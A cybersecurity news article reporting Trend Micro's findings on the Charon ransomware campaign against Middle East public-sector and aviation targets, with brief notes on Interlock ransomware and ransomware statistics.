Charon Ransomware Targets Middle East using APT Techniques. Cybersecurity researchers have identified a new ransomware family called Charon, actively targeting the Middle East public sector and aviation industry. According to Trend Micro, the threat actor behind this campaign uses advanced persistent threat (APT) techniques to bypass detection and maximise damage.
How does the Charon Ransomware Attack work?
The attackers employ DLL side-loading, process injection, and endpoint detection and response (EDR) evasion. These tactics are commonly associated with nation-state cyber operations.
Researchers found similarities to Earth Baxia, a China-linked hacking group. Earth Baxia previously targeted government organisations in Taiwan and the Asia-Pacific with the EAGLEDOOR backdoor.
In this case, the attackers exploited a GeoServer security flaw to sideload a malicious DLL and deploy the Charon ransomware payload. The attack chain began with a legitimate browser file (Edge.exe) renamed from cookie_exporter.exe. This file sideloaded a malicious DLL (msedge.dll/SWORDLDR), which delivered the Charon ransomware.
Like other ransomware, Charon:
- Terminates security services and processes
- Deletes backups and shadow copies
- Uses multithreading and partial encryption for faster attacks
Charon Use Dark-Kill Driver and BYOVD Attack
A notable feature of Charon ransomware is its use of a driver from the Dark-Kill open-source project. This enables a bring your own vulnerable driver (BYOVD) attack, designed to disable EDR solutions. However, researchers noted that this function was not triggered during execution. They suggest it is still under development.
Targeted Campaign With Custom Ransom Notes
Evidence suggests this campaign was targeted, not opportunistic. The attackers delivered custom ransom notes, calling out victim organisations by name, a tactic rarely seen in traditional ransomware operations. At present, researchers do not know how the attackers gained initial access.
Is there a confirmed link to Earth Baxia?
The technical overlaps with Earth Baxia leave three possible explanations:
- Direct involvement by Earth Baxia
- A false flag operation imitating Earth Baxia tactics
- A new actor developing similar methods
Trend Micro emphasised there is limited but notable convergence with Earth Baxia’s previous operations, but no confirmed link.
Rising Convergence of Ransomware and APT Tactics
This attack highlights a disturbing trend: ransomware groups adopting nation-state tradecraft. By combining APT-style evasion techniques with ransomware encryption, attackers create an elevated risk for businesses. The findings stress the need for robust monitoring, EDR solutions, and employee awareness to prevent ransomware infections.
Interlock Ransomware Adds to the Threat
Around the same time, eSentire detailed a campaign by the Interlock ransomware group.
This attack used ClickFix lures, deploying:
- PHP backdoors
- NodeSnake (Interlock RAT) for credential theft
- C-based implants for reconnaissance and ransomware delivery
Researchers highlighted the importance of monitoring PowerShell scripts, LOLBins, and suspicious process activity to detect such campaigns.
The Growing Impact of Ransomware
Ransomware attacks remain a global cybersecurity crisis.
Key statistics from Barracuda show:
- 57% of organisations suffered a successful ransomware attack in the past year
- 71% of email breach victims were also hit by ransomware
- 32% of victims paid a ransom, but only 41% fully recovered their data
This data underscores the importance of proactive cybersecurity, incident response planning, and employee training.
What does this Charon Ransomware case mean for the Middle East?
The emergence of Charon ransomware in the Middle East highlights the evolving nature of cybercrime. Attackers are increasingly blurring the lines between cybercrime syndicates and nation-state actors.
Organisations in critical sectors must strengthen defences, invest in threat intelligence, and prepare for sophisticated ransomware attacks that go beyond traditional methods.
